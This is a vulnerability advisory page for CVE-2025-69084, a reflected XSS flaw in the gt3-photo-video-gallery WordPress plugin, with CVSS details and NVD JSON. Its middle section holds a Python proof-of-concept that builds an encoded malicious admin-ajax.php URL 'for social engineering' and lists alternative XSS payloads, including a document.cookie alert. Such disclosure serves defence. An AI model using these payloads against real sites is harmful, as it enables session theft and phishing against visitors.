Security Vulnerability Report
中文
CVE-2025-69084 CVSS 7.1 HIGH

CVE-2025-69084

Published: 2026-01-06 17:15:45
Last Modified: 2026-04-23 15:36:20

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gt3themes Photo Gallery gt3-photo-video-gallery allows Reflected XSS.This issue affects Photo Gallery: from n/a through <= 2.7.7.26.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

gt3-photo-video-gallery <= 2.7.7.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re import urllib.parse def generate_xss_payload(): """ CVE-2025-69084 PoC - Reflected XSS in gt3-photo-video-gallery Affected: gt3-photo-video-gallery <= 2.7.7.26 """ # Malicious JavaScript payload payload = '<script>alert(document.domain)</script>' # URL encode the payload encoded_payload = urllib.parse.quote(payload) # Target URL pattern (vulnerable parameter) target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php' # Construct malicious URL malicious_url = f'{target_url}?action=gt3pg_get_image&src={encoded_payload}' print('Malicious URL for Social Engineering:') print(malicious_url) print() # Alternative payloads payloads = [ '<img src=x onerror=alert(document.cookie)>', '<svg onload=alert(String.fromCharCode(88,83,83))>', 'javascript:alert(document.domain)', '<iframe src="javascript:alert(document.domain)">' ] print('Alternative XSS Payloads:') for p in payloads: print(f' - {urllib.parse.quote(p)}') if __name__ == '__main__': generate_xss_payload()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69084", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:45.267", "lastModified": "2026-04-23T15:36:19.857", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gt3themes Photo Gallery gt3-photo-video-gallery allows Reflected XSS.This issue affects Photo Gallery: from n/a through <= 2.7.7.26."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gt3-photo-video-gallery/vulnerability/wordpress-photo-gallery-plugin-2-7-7-26-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}